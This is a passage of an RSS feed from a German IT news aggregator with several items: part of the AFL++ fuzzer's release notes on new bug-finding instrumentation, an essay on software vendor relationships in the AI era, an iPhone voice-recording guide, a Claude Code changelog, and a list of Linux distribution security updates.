<li><code>AFL_LLVM_BUG_SCALAR=1</code>   - max-value-per-arithmetic-site coverage,<br>
plus per-loop iteration count</li>
<li><code>AFL_LLVM_BUG_SCALAR_SLICE=1</code> - restrict SCALAR instrumentation to<br>
arithmetic that flows into a memory-<br>
size sink (allocator size, GEP index,<br>
memcpy/memset length). Implies SCALAR.</li>
<li><code>AFL_LLVM_BUG_BUDGET=1</code>   - check <code>ptr += func()</code> write-extent<br>
contract</li>
<li><code>AFL_LLVM_BUG_SIZEFILL=1</code>  - check NULL-means-size-only idioms</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE=1</code> - track every malloc/calloc/realloc and<br>
feed three signals (headroom IJON-min,<br>
proximity-bucket coverage edge, soft-OOB<br>
tripwire) per in-loop store</li>
<li><code>AFL_LLVM_BUG_SLACK=1</code>    - per-icmp |op0-op1| feedback, mapped<br>
MIN-style onto the bug map (inverse-<br>
bucket) for tight-comparison signal</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_FUNCS=Name1,Name2,...</code> - extend tracking<br>
to user-listed custom allocators</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_FREE_FUNCS=Name1,Name2,...</code> - matching<br>
custom-free functions for the above</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_DERIVE=1</code> - log tracked allocation sizes<br>
into CmpLog RTN slots for <code>-l Z</code></li>
<li><code>AFL_LLVM_BUG=1</code>           - enable all bug-pass modes<br>
Per-site bug-map slots are kept in a private MAP_SIZE_BUG region and<br>
tracked max-rule (compatible with the IJON model)</li>
</ul>
</li>
<li>cmplog scheduling extensions (companion to bug-pass):
<ul>
<li><code>-l M</code> (afl-fuzz) - predicate-tightness scheduling. Treat any<br>
new per-site minimum slack on an inequality CmpLog cmp as a<br>
coverage event and mark the queue entry favoured. Catches the<br>
libwebp-1.3.1 / <a title="CVE-2023-4863" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-j7hp-h8jx-5ppr/hovercard" href="https://github.com/advisories/GHSA-j7hp-h8jx-5ppr">CVE-2023-4863</a> input pattern (validation<br>
predicates simultaneously at their tight edges).</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_DERIVE=1</code> or <code>AFL_LLVM_BUG=1</code><br>
(compile-time) and<br>
<code>-l Z</code> (afl-fuzz) - size-derive logging. On every freed tracked<br>
allocation, write <code>(computed_size, max_observed_offset)</code> into a<br>
CmpLog RTN slot keyed by alloc-site. The existing CmpLog<br>
dictionary mining harvests <code>computed_size</code> as a magic constant<br>
and feeds the producing input bytes back into havoc.</li>
</ul>
</li>
</ul>
</li>
<li>afl-cmin*:
<ul>
<li>nyx_mode is now working for all minimizer variants</li>
</ul>
</li>
<li>afl-showmap:
<ul>
<li>no more .afl-showmap-temp-* files lying around</li>
</ul>
</li>
<li>IJON dist was changed to original IJON implementation: initial matching<br>
bytes, max length is 1024</li>
<li>lib* tools:
<ul>
<li>MacOS support is back, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jay-1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jay-1409">@Jay-1409</a> !</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Resume Builders for Designers, Developers, and Digital Creators in 2026]]></title>
<description><![CDATA[For certain professions, like designers, developers, and digital creators, the portfolio-first idea keeps coming back. As...
The post Best Resume Builders for Designers, Developers, and Digital Creators in 2026 appeared first on Fossbytes.]]></description>
<link>https://tsecurity.de/de/3569225/linux-tipps/best-resume-builders-for-designers-developers-and-digital-creators-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569225/linux-tipps/best-resume-builders-for-designers-developers-and-digital-creators-in-2026/</guid>
<pubDate>Wed, 03 Jun 2026 12:51:38 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>For certain professions, like designers, developers, and digital creators, the portfolio-first idea keeps coming back. As...</p>
<p>The post <a rel="nofollow" href="https://fossbytes.com/best-resume-builders-2026/">Best Resume Builders for Designers, Developers, and Digital Creators in 2026</a> appeared first on <a rel="nofollow" href="https://fossbytes.com/">Fossbytes</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The value of vendor relationships in the AI era]]></title>
<description><![CDATA[Since the rapid expansion of AI tools, the balance of power between customers and vendors has shifted dramatically. Organizations are no longer as dependent on software developers, solution architects and integration specialists to build functional tools or workflows. Today, internal teams can le...]]></description>
<link>https://tsecurity.de/de/3569112/it-nachrichten/the-value-of-vendor-relationships-in-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569112/it-nachrichten/the-value-of-vendor-relationships-in-the-ai-era/</guid>
<pubDate>Wed, 03 Jun 2026 12:18:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Since the rapid expansion of AI tools, the balance of power between customers and vendors has shifted dramatically. Organizations are no longer as dependent on software developers, solution architects and integration specialists to build functional tools or workflows. Today, internal teams can leverage platforms such as Claude, Lovable, Perplexity and other AI-assisted development tools to quickly prototype and even deploy functional products with minimal technical resources. What once required months of vendor engagement and implementation cycles can now be tested internally in days. Recent reporting from Business Insider highlighted how <a href="https://www.businessinsider.com/ai-coding-tools-buy-versus-build-software-saas-netlify-bolt-2025-6" rel="nofollow">AI coding tools are reshaping the traditional build-versus-buy equation and placing pressure on legacy SaaS business models</a> as organizations increasingly evaluate what can be developed internally versus purchased externally.</p>



<p>This shift has created a new reality for software vendors. Technical complexity alone is no longer enough to justify long implementations, bloated subscriptions or stagnant roadmaps. However, this does not mean vendor relationships are losing value. In many ways, the opportunity for stronger vendor and customer partnerships has never been greater. Vendors that adapt to this new environment and align themselves with the speed and urgency of their customers will remain essential strategic partners.</p>



<p>Customers have become more empowered because AI democratizes access to development and analytics capabilities. Business intelligence and reporting no longer need to rely on feeding data downstream into rigid systems that require specialized development work to interpret. Organizations now have direct access to APIs, AI-assisted analytics and centralized data strategies that allow them to build insights and workflows faster than ever before. This is especially important in industries like hospitality where data is often fragmented across multiple systems, vendors and operational platforms.</p>



<p>As a result, technology stacks are likely to shrink over the next several years. Standalone business intelligence tools, reporting platforms and low-value SaaS subscriptions are among the most vulnerable categories. Organizations are beginning to question why they should continue paying significant licensing fees for platforms that only visualize information when modern AI tools can analyze, summarize and operationalize that same data in real time. Middleware and excessive integration layers may also become less necessary as organizations centralize data and leverage direct API connectivity.</p>



<p>That said, software vendors still provide tremendous value when they mature their approach and focus on solving real business problems. Scalability, reliability, security, compliance and operational expertise still matter significantly. While internal AI development tools can accelerate innovation, many organizations lack the in-house subject matter expertise, governance models and support structures necessary to maintain enterprise-grade systems long term. AI-assisted development connectors can also be unstable, and security concerns remain top of mind for organizations handling sensitive customer or operational data.</p>



<p>This is where vendors have an opportunity to separate themselves from becoming replaceable integrations or bottlenecks. Vendors that survive this shift will be the ones that respond faster, deliver innovation quicker and maintain accountability to their product roadmaps. McKinsey &amp; Company recently noted that <a href="https://www.mckinsey.com/industries/technology-media-and-telecommunications/our-insights/upgrading-software-business-models-to-thrive-in-the-ai-era" rel="nofollow">software providers are being forced to rethink traditional SaaS business models</a> as customers increasingly expect AI-native workflows, embedded automation and faster delivery cycles tied directly to operational outcomes. Customers now understand how quickly solutions can be built internally. That changes expectations dramatically. If internal non-technical users can ship prototypes in a matter of days, SaaS providers can no longer justify excessively slow-release cycles, expensive implementations or unclear timelines.</p>



<p>One of the biggest differentiators moving forward will be the ability to provide AI-native actionable insights instead of generic AI features. Simply embedding a chatbot or basic large language model into a platform is no longer impressive. Customers are looking for systems that can identify meaningful business opportunities and operational risks while enabling workflows that immediately drive action.</p>



<p>In hospitality, for example, actionable AI could identify that a large group booking has unexpectedly cancelled, creating a sudden occupancy gap. The insight alone is not enough. Modern systems should automatically recommend pricing adjustments to regain market share, identify labor scheduling opportunities to reduce unnecessary staffing costs, and surface operational changes that help the business pivot quickly. Human decision-makers still remain critical, but systems should actively support and accelerate those decisions.</p>



<p>The same principle applies to guest experience. AI should not stop at generic automated responses that mimic a knowledge base article. It should support workflows that can modify reservations, process upgrades, suggest ancillary purchases, offer late check-outs or proactively identify previous guest issues so staff can avoid repeating negative experiences. If a guest previously had a poor stay due to housekeeping delays or room issues, that information should surface operationally before the guest arrives again. These are the types of capabilities that create measurable value instead of superficial AI features designed primarily for marketing purposes.</p>



<p>At the same time, organizations must also address the challenges of AI governance. One of the largest mistakes companies are making today is deploying AI tools without structure, training or clear expectations. AI sprawl is becoming increasingly common as departments independently adopt tools without governance, risk assessments or measurable business objectives. This creates operational friction, inconsistent adoption and rising costs that become difficult to manage.</p>



<p>Good AI governance begins with deploying approved enterprise-grade tools that protect organizational data and privacy. Companies must establish clear policies around acceptable use, train employees on practical workflows, evaluate risks associated with integrations and continuously measure return on investment. Too many AI initiatives are abandoned without understanding whether they delivered business value or valuable organizational learning. Even unsuccessful initiatives can provide important lessons that shape future innovation strategies.</p>



<p>Pricing expectations are also changing rapidly. Customers now understand how AI accelerates development and reduces operational overhead. As a result, they are becoming less tolerant of large subscription costs tied to low-value platforms. Organizations are increasingly questioning why they should commit to expensive long-term contracts for products they believe could be recreated internally at a fraction of the cost using modern AI tooling and token-based consumption models.</p>



<p>Vendors must remain competitive by reducing implementation complexity, improving pricing transparency and avoiding unnecessary premium charges for AI functionality. Customers are looking for predictable consumption models, flexible feature packaging and pricing structures that reflect the realities of modern software development. Locking organizations into massive subscription agreements without demonstrating measurable operational value will only accelerate dissatisfaction and replacement efforts.</p>



<p>The cultural relationship between vendors and customers is also evolving. Customers no longer want vendors to operate as gatekeepers. They expect collaboration, transparency, responsiveness and a genuine seat at the table when product decisions are being made. Vendor relationships are becoming more collaborative and innovation-driven, with customers acting as co-builders rather than passive consumers of technology.</p>



<p>The vendors that will win in the AI era are the ones that understand this shift and embrace it. They will move with urgency, partner closely with customers, make data accessible, provide actionable operational intelligence and maintain pricing models that feel fair in today’s environment. Organizations are not looking to eliminate vendors entirely. They are looking for vendors that evolve alongside them.</p>



<p>AI has not eliminated the value of vendor relationships. It has simply raised the standard for what makes those relationships valuable.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Record on iPhone: Complete Guide to Recording Audio]]></title>
<description><![CDATA[Need to record a lecture, meeting, interview, voice note, or a quick idea on your iPhone? The good news is that every iPhone comes with a built-in audio recorder called Voice Memos, and it takes only a few seconds to start recording.



Over the years, Apple has improved Voice Memos with better e...]]></description>
<link>https://tsecurity.de/de/3568895/ios-mac-os/how-to-record-on-iphone-complete-guide-to-recording-audio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568895/ios-mac-os/how-to-record-on-iphone-complete-guide-to-recording-audio/</guid>
<pubDate>Wed, 03 Jun 2026 10:53:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Need to record a lecture, meeting, interview, voice note, or a quick idea on your iPhone? The good news is that every iPhone comes with a built-in audio recorder called Voice Memos, and it takes only a few seconds to start recording.



Over the years, Apple has improved Voice Memos with better editing tools, background noise reduction, audio sharing options, transcription support, and advanced recording modes on newer iPhone models. Whether you're using a recent iPhone or an older model, this guide covers everything you need to know about recording audio on iPhone.



Table of contentsMethod 1: Record Audio Using the Voice Memos AppMethod 2: Pause and Resume a RecordingMethod 3: Edit and Trim Your RecordingMethod 4: Share a RecordingMethod 5: Improve Recording Quality on iPhoneUse Voice IsolationChange Recording ModeMethod 6: Start Recording Quickly With the Action ButtonTips for Better Audio RecordingsFAQsSummaryConclusion



Method 1: Record Audio Using the Voice Memos App



The easiest way to record audio on an iPhone is with the built-in Voice Memos app. It is free, pre-installed, and designed specifically for recording voice and sound.




Open the Voice Memos app.



Tap the red Record button at the bottom of the screen.



Speak into the iPhone microphone or place the phone near the sound source.



Watch the waveform to confirm audio is being recorded.



Tap the Stop button when finished.



Your recording will be saved automatically.



Tap the recording name to rename it if needed.




Method 2: Pause and Resume a Recording



You don't have to create multiple recordings if you need a short break.



Voice Memos lets you pause and continue recording within the same file. This is useful during long meetings or presentations.




Start recording in Voice Memos.



Swipe up on the recording panel to reveal more controls.



Tap Pause.



When ready, tap Resume.



Continue recording.



Tap Done when finished.








Method 3: Edit and Trim Your Recording



If your recording contains unnecessary audio at the beginning or end, you can trim it directly in Voice Memos.




Open the Voice Memos app.



Select the recording you want to edit.



Tap the More menu.



Choose Edit Recording.



Tap the Trim tool.



Drag the yellow handles to select the section you want to keep.



Tap Trim.



Save the changes.




Method 4: Share a Recording



Once you've recorded audio, you can quickly send it to someone else or save it to cloud storage.




Open the recording in Voice Memos.



Tap the More menu.



Select Share.



Choose one of the available options:

Messages



Mail



AirDrop



Files



iCloud Drive



Third-party apps





Send or save the recording.








Method 5: Improve Recording Quality on iPhone



Apple has added several features that can make recordings sound much better, especially on newer iPhones.



Use Voice Isolation



Voice Isolation helps reduce background noise and makes speech clearer.




Open Voice Memos.



Open Control Center while recording.



Tap the audio controls at the top.



Select Voice Isolation.




Change Recording Mode



Newer iPhones support multiple recording formats.




Open Settings.



Tap Apps &gt; Voice Memos.



Select Recording Mode.



Choose:

Mono



Stereo



Spatial Audio (supported models only)










Method 6: Start Recording Quickly With the Action Button



If you have an iPhone with an Action Button, you can assign it to Voice Memos and start recording instantly without opening the app.




Open Settings.



Tap Action Button.



Swipe until you find Voice Memo.



Exit Settings.



Press and hold the Action Button to start recording.



Press it again to stop.








Tips for Better Audio Recordings




Record in a quiet room whenever possible.



Keep the microphone pointed toward the speaker.



Hold the phone about 6 to 12 inches away from your mouth.



Use wired or wireless microphones for professional-quality audio.



Rename recordings immediately after creating them.



Enable iCloud sync to back up important recordings.



Check available storage before recording long sessions.




FAQs



Where is the Voice Memos app on iPhone? You'll usually find it inside the Utilities folder. You can also swipe down on the Home Screen and search for "Voice Memos."  Is there a recording time limit on iPhone? No. Voice Memos can record for hours as long as your iPhone has enough available storage space.  Can I use other apps while recording? Yes. Voice Memos can continue recording while you use another app, provided the other app doesn't start playing audio.  Can I record phone calls with Voice Memos? No. Voice Memos cannot directly record phone calls. Recording calls requires separate features or apps and may be subject to local laws.  Can I edit recordings after saving them? Yes. Voice Memos allows you to trim, replace, and edit recordings after they are saved.  Do recordings sync across Apple devices? Yes. When Voice Memos is enabled in iCloud, recordings can sync between your iPhone, iPad, and Mac.  



Summary




Open the Voice Memos app.



Tap the Record button.



Speak or capture the audio you need.



Tap Stop when finished.



Rename the recording for easy access.



Edit or trim the audio if necessary.



Share the recording through Messages, Mail, AirDrop, or Files.



Use Voice Isolation and advanced recording modes for better sound quality.



Enable iCloud sync to keep recordings backed up.



Use the Action Button on supported iPhones for one-tap recording.




Conclusion



Recording audio on an iPhone is one of the simplest tasks you can perform, yet it's also one of the most useful. The built-in Voice Memos app can handle everything from quick reminders and classroom lectures to interviews and creative projects. With features like trimming, sharing, Voice Isolation, iCloud syncing, and advanced recording modes, it has evolved into a surprisingly capable audio recorder.



Once you become familiar with Voice Memos, you'll always have a reliable way to capture important conversations, ideas, and moments wherever you are.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.161]]></title>
<description><![CDATA[What's changed

OTEL_RESOURCE_ATTRIBUTES values are now included as labels on metric datapoints, so you can slice usage metrics by custom dimensions like team or repo
claude agents rows now show done/total before the detail when work is fanned out; peek shows the longest-running item
/mcp now col...]]></description>
<link>https://tsecurity.de/de/3567727/downloads/v21161/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567727/downloads/v21161/</guid>
<pubDate>Wed, 03 Jun 2026 00:01:31 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li><code>OTEL_RESOURCE_ATTRIBUTES</code> values are now included as labels on metric datapoints, so you can slice usage metrics by custom dimensions like team or repo</li>
<li><code>claude agents</code> rows now show <code>done/total</code> before the detail when work is fanned out; peek shows the longest-running item</li>
<li><code>/mcp</code> now collapses claude.ai connectors you've never signed in to behind a "Show unused connectors" row</li>
<li>Parallel tool calls: a failed Bash command no longer cancels other calls in the same batch — each tool returns its own result independently</li>
<li>Fullscreen mode: clipboard now uses <code>wl-copy</code>/<code>xclip</code>/<code>xsel</code> on Linux when available, copies to both the clipboard and PRIMARY selection for middle-click paste, and the "hold {key} for native selection" hint now shows the correct key per terminal</li>
<li>Fixed the <code>/effort</code> dialog, workflow animations, and prompt keyword shimmer not honoring the "Reduce motion" setting</li>
<li>Fixed <code>forceLoginOrgUUID</code>/<code>forceLoginMethod</code> managed-settings policies blocking third-party provider sessions (Bedrock, Vertex, Foundry, Mantle) alongside the org pin (regression in 2.1.146)</li>
<li>Fixed background subagent output corrupting <code>claude -p</code> stdout when using <code>--output-format text</code> or <code>json</code></li>
<li>Fixed <code>/usage-credits</code> starting a re-login for Team and Enterprise admins instead of pointing to the organization's usage settings page</li>
<li>Fixed <code>/autofix-pr</code> reporting "cannot run on the default branch" when the session is inside a git worktree or another repository</li>
<li>Fixed <code>--resume</code> picker not showing sessions from the current directory when it isn't a git worktree (e.g., jj workspaces)</li>
<li>Fixed Windows hooks that invoke bash explicitly (e.g., <code>/usr/bin/bash script.sh</code>) failing with "command not found" or "cannot execute binary file"</li>
<li>Fixed OpenTelemetry log events (<code>user_prompt</code>, <code>api_request</code>, <code>tool_result</code>, <code>tool_decision</code>) being silently dropped when emitted before telemetry initialization completed</li>
<li>Fixed <code>claude mcp</code> list/get/add printing secrets to the terminal: <code>${VAR}</code> references are no longer expanded, and credential headers and URL secrets are redacted</li>
<li>Fixed Workflow agents spawned with <code>isolation: "worktree"</code> in background sessions being blocked from editing files inside their own worktree</li>
<li>Fixed background sessions dispatched from <code>claude agents</code> booting on a stale model from the daemon's environment instead of the model in <code>settings.json</code></li>
<li>Fixed a potential crash when rendering Write tool results after resuming a session</li>
<li>Fixed completed subagents getting stuck showing as running when an error occurs while finalizing their result</li>
<li>Fixed <code>EADDRINUSE</code> errors from tools that bind Unix sockets under <code>$TMPDIR</code> when <code>CLAUDE_CODE_TMPDIR</code> is set to a deep path</li>
<li>Improved terminal rendering performance by stabilizing the layout engine's JIT compilation profile</li>
<li>Improved rendering performance for large file writes</li>
<li>[VSCode] Added a tip suggesting disabling terminal GPU acceleration (or running <code>/terminal-setup</code>) to fix garbled glyphs</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (php:8.2 and php:8.3), Debian (gst-plugins-good1.0, symfony, and yelp), Fedora (dovecot, freeipa, hplip, libpng, perl-Catalyst-Plugin-Authentication, postfix, samba, unbound, and vim), Mageia (assimp, libcaca, sdl2_sound, and tar), Slackware (kernel)...]]></description>
<link>https://tsecurity.de/de/3566223/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566223/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 02 Jun 2026 15:10:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (php:8.2 and php:8.3), <b>Debian</b> (gst-plugins-good1.0, symfony, and yelp), <b>Fedora</b> (dovecot, freeipa, hplip, libpng, perl-Catalyst-Plugin-Authentication, postfix, samba, unbound, and vim), <b>Mageia</b> (assimp, libcaca, sdl2_sound, and tar), <b>Slackware</b> (kernel), <b>SUSE</b> (alloy, apache-commons-lang3, apache-commons-text,, apache2, bubblewrap, busybox, chromium, cups, docker-stable, ffmpeg-8, google-osconfig-agent, gsasl, ignition, java-26-openjdk, kernel, libsolv-demo, libsoup, libzypp, localsearch, openjpeg2, postgresql-jdbc, putty, python-mistune, python-Pillow, python-python-multipart, python-Twisted, python3-Twisted, re, roundcubemail, vim, wireshark, and xz), and <b>Ubuntu</b> (evolution-data-server, exim4, gsasl, haveged, lcms2, libreoffice, linux-aws, linux-lts-xenial, linux-lowlatency, linux-nvidia-tegra, nginx, nncp, qtdeclarative-opensource-src, sslh, sssd, and xz-utils).]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,36ms -->